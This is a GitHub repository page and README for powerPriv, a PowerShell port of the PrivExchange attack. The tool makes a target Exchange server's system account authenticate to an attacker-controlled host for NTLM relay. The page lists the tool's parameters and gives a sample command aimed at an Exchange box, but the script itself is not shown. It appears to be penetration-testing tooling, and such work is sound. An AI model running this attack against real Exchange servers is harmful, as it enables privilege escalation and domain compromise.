A PowerShell implementation of PrivExchange designed to run under the current user's context
G0ldenGunSec no email check
added an error code if user didn't have a mailbox associated with their account.
Latest commit b5fa8bb Jan 31, 2019
Type Name Latest commit message Commit time
.gitattributes Initial commit Jan 31, 2019
LICENSE Initial Release Jan 31, 2019
README.md Update README.md Jan 31, 2019
powerPriv.ps1 no email check Jan 31, 2019




A PowerShell implementation of PrivExchange by @_dirkjan (original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py). Useful for environments in which you cannot run Python-based applications, have user credentials, or do not want to drop files to disk. It causes the target Exchange server's system account to attempt to authenticate to a system of your choice.


Hostname or IP of the target Exchange box. Depending on DNS configuration, an FQDN may be required if using a hostname. (Required)


Hostname or IP of a system you control, ideally one running ntlmrelayx. We are telling the Exchange server to attempt to authenticate to this system. Depending on DNS configuration, an FQDN may be required if using a hostname. (Required)


Port on which to connect to the Exchange server. Default is 443.


Port on which Exchange should attempt to connect back to the attacker. Default is 80.


Page we are telling the Exchange server to connect to on our attack system. Slashes are not required. Default is powerPriv.


Set to true if you don't want to use HTTPS for the initial connection to the Exchange server. Default is false (use HTTPS).


Version of Exchange server we're targeting. Default is 2013.


powerPriv -targetHost corpExch01 -attackerHost -Version 2016


Author: @g0ldenGunSec - Based on the tool created by @_dirkjan
Only use this tool on networks you own or have permission to test against.